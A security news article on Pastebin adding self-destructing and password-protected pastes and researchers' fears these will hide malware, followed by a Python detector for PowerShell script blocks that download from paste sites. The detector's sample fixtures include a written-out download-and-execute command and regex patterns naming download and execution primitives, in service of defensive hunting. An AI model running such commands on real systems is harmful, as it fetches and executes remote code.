Cybersecurity specialists oppose new Pastebin functions
Last week, the world’s most popular paste site, Pastebin, ranked in the top 2000 most popular sites on the Internet by Alexa, added two new features that were criticized by the cybersecurity community.
We are talking about the Burn After Read (self-destruction) and Password Protected Pastes (password protection) functions, which have long existed on other paste sites but until recently were missing from Pastebin.
The problem is that Pastebin has long attracted criminals and contained a lot of illegal content, even before it had the new functions. Stolen data is regularly uploaded to the site, and hackers use it to host malware and code, as a repository of IP addresses for C&C servers, and so on.
ZDNet cites cybersecurity expert Ted Samuels, who said that abuse is quite common on Pastebin.
“Pastebin is the most popular paste site today and a fairly popular platform for fileless attacks using PowerShell. For example, an attacker’s initial payload could use PowerShell to download additional (and often obfuscated) content from pastebin.com for execution via PowerShell. Thus, you can even load the CobaltStrike framework,” says the specialist.
To counter this, many information security companies long ago created tools that scrape new entries on Pastebin and search them for malware and confidential data. Such malicious pastes are then not only indexed and included in private threat databases, but also come to the attention of the Pastebin administration, after which they are deleted.
Now many experts are seriously concerned that the new Pastebin functions will interfere with the work of such tools, that tracking new pastes in real time will become much more difficult, and that Pastebin will finally turn into a shelter for criminals.
ZDNet recalls that the relationship between Pastebin and information security experts has been tense for a long time.
For example, in the spring of this year, the Pastebin developers unexpectedly announced the end of support for the Scraping API, which specialists used to scrape data and detect threats according to the above scheme.
After an extremely negative reaction from the community, it was decided to abandon this idea. But now that hackers have the opportunity to protect their pastes with passwords or destroy them, the Scraping API can still become practically useless for researchers, and the resource will become completely “opaque”.
At the same time, Pastebin representatives assured the journalists that they introduced new functions at the request of users.
“Pastebin stores important data for its users, from calculations and engineering data, such as algorithms, logs of various services, robots, network devices, and ending with proprietary software code. We have received many requests from users who asked to implement these features because of their privacy rights and to help them protect their work. Pastebin was created by developers for developers and is used by millions of people around the world. Of course, every platform has attackers trying to abuse its benefits, including GitHub, Twitter, Facebook, Dropbox, Privnotes and Sendspace,” the company said.
The developers also believe that information security experts are being overly dramatic, because there are dozens of other paste sites on the network, many of which are much more tolerant of abuse on their platforms. In addition, the company recalled that it is actively fighting malicious content, cooperating with CERT, information security companies and law enforcement agencies around the world, and also providing free access for researchers and scientists.
And here are some positive examples of addressing threats through Pastebin: one German information security researcher hacked the Muhstik ransomware server and released decryption keys, after which he published the results for everyone on Pastebin, and another information security specialist researched the Echobot IoT malware and shared all payloads on Pastebin.
Information security experts, in turn, have long been saying that Pastebin and other similar sites should be blocked on corporate networks. After all, everyone knows that intruders abuse them, which means that such resources should be treated accordingly.
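Where blocking is not an option, the PowerShell download pattern Samuels describes can still be hunted on the endpoint, independently of whether the paste itself can be scraped. The following is an added example, not code from the article, ZDNet or Pastebin: it grades PowerShell script block text by whether it references a paste site, downloads from it, and executes the result in memory. The host list, verdict names and sample script blocks are constructed assumptions.

```python
import re

# Hosts to watch. pastebin.com is the site named in the article; the list is
# an assumption and can be extended with other paste sites.
PASTE_HOSTS = ("pastebin.com",)

# PowerShell download primitives, then in-memory execution of the result.
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|downloaddata|net\.webclient"
    r"|invoke-webrequest|invoke-restmethod|start-bitstransfer"
    r"|\b(?:iwr|irm|curl|wget)\b",
    re.IGNORECASE,
)
EXEC_RE = re.compile(r"invoke-expression|\biex\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://([a-z0-9.-]+)(?:/[^\s'\"()|;]*)?", re.IGNORECASE)

# Constructed script block texts (as recorded by PowerShell script block
# logging); paste IDs are placeholders.
SAMPLE_BLOCKS = [
    "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/XXXXXXXX')",
    "Invoke-WebRequest -Uri https://pastebin.com/raw/XXXXXXXX -OutFile notes.txt",
    "Write-Host 'see https://pastebin.com/XXXXXXXX for the log'",
    "iwr https://notpastebin.com.example/raw/XXXXXXXX | iex",
    "Get-ChildItem C:\\Users",
]


def paste_urls(text):
    """Return URLs whose host is a watched paste site or one of its subdomains."""
    hits = []
    for m in URL_RE.finditer(text):
        host = m.group(1).lower().rstrip(".")
        if any(host == h or host.endswith("." + h) for h in PASTE_HOSTS):
            hits.append(m.group(0))
    return hits


def classify(block):
    """Grade a script block: None, 'paste-url', 'download' or 'download-exec'."""
    if not paste_urls(block):
        return None
    if not DOWNLOAD_RE.search(block):
        return "paste-url"
    return "download-exec" if EXEC_RE.search(block) else "download"


def scan(blocks):
    """Return (verdict, block) pairs for every block that touches a paste site."""
    return [(v, b) for b in blocks if (v := classify(b)) is not None]
```

Matching on the parsed host rather than a substring keeps lookalike domains such as the fourth sample from raising alerts; `download-exec` is the verdict worth paging on.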